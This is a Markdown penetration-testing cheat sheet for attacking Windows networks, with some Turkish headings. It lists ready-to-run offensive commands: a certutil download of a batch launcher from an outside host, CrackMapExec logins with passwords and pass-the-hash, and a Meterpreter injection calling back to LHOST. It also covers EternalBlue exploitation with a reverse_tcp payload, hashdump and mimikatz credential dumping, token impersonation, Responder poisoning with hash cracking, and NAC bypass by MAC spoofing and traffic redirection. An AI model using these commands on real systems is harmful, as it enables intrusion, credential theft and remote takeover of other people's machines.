--- tags: Windows --- # Windows ## File Download - `certutil.exe -urlcache -split -f http://10.10.10.10:9001/launcher.bat` ## CrackMapExec [CME Github](https://github.com/byt3bl33d3r/CrackMapExec/wiki/Getting-Shells-101) - `crackmapexec smb 192.168.10.11` - `crackmapexec smb 192.168.10.11 -u 'user' -p 'pass'` - `crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami --local-auth (Local Deneme)` - `crackmapexec smb 192.168.10.11 -u username -H LMHASH:NTHASH` - `crackmapexec smb 192.168.10.11 -u username -H NTHASH` - `crackmapexec 192.168.10.0/24 -u username -p password -M metinject -o LHOST=192.168.10.3 LPORT=8443` ## MS17_010 - `nbtscan -r 10.12.103.1/8 > nbtscan.text; cut -f1 -d' ' nbtscan.text > ms_17_10_ip_list` - `nmap -p445 --script smb-vuln-ms17-010 -iL ms_17_10_ip_list` **eternalblue** - `use exploit/windows/smb/ms17_010_eternalblue` - `use exploit/windows/smb/ms17_010_psexec` - `set payload windows/x64/meterpreter/reverse_tcp` - `set VerifyArch false` - `set VerifyTarget false` - `set Prosessname lass.exe` **meterpreter** - `sysinfo` - `getuid` - `hashdump` - `load mimikatz` - `mimikatz command -f samdump::hashes` - `mimikatz_command -f sekurlsa::searchPasswords` - `kerberos` - `msv` - `use incognito` - `list_tokens -u` ## LLMNR ve NBT-NS Zehirlenmesi - `python Responder.py -i 192.168.1.77 -b 0` - `python Responder.py -i eth0 -wrf` - `python Responder.py -I eth0 -wfv` **Responder/log** - `john SMB-NTLMv2-Client-192.168.1.74.txt --show` ## NAC Bypass - `macchanger -m 00:0c:29:6c:64:85 eth0` **sudo vim /etc/network/interfaces** - `auto eth0` - `iface eth0 inet static` - `address 192.168.0.100/24 (192.168.0.99)` - `gateway 192.168.0.254` - `netmask255.255.255.0` **Forescout** > NAC gelip sendeki bir programı kontrol ediyor, atlatmak için bütün istekleri ağdaki başka bir makineye yönlendiriyorsun. - `iptables -t nat -A POSTROUTING -j MASQUERADE` - `iptables -t nat -A PREROUTING -i eth0 -j DNAT --to 10.2.160.11` - `echo 1 > /proc/sys/net/ipv4/ip_forward`